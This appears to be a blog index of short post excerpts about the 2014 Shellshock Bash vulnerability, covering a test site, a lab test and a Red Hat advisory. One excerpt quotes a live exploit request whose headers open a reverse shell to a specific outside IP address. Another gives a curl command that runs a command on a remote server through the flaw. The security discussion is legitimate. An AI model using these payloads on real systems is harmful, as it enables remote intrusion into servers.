Bash Shellcode test site made

this is interesting: https://shellshocker.net/ Is an interesting site…  You can enter your domain name and they will tell you if you have the Bash Shellcode vulnerability. At this time they found 1767 vulnerable hosts: 107760 Total tests to date. 1767 Total vulnerable hosts found. It is also called the Shellshock vulnerability. As I mentioned in previous posts: … Read more

Bash shell code vulnerability is as bad as advertised

Wednesday  evening we ran a bash script command against a lab computer which was designed to be vulnerable   Downloaded a system .iso file from http://www.vulnhub.com   It is from the Pentester Lab section https://twitter.com/PentesterLab/status/515079459284594688  then started the computer (now I had a test lab computer system) Then ran the above command on a Kali Linux machine … Read more

Another Hacker shows how to hack Bash Shellcode

Google Web Cache of the exploit char *request = “GET %s HTTP/1.0\r\nUser-Agent: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nCookie: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nHost: %s\r\nReferer: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\n\r\n”;   which as it is explained in the link (by the hacker) is to run a … Read more

RedHat still vulnerable to Bash shellcode

RedHat customer portal Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169. This issue (CVE 2014-6271) has not been resolved on RedHat Operating systems (i.e. no … Read more

Other bash shell tests – remote tests

Use commands to test remote sites: curl -A “() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id” $URL   I did it to my website (www.fixvirus.com)   obviously use the test website instead of $URL.   Contact Me as i develop more tests for remote bash exploit tests… With us to get more information that is topical like this.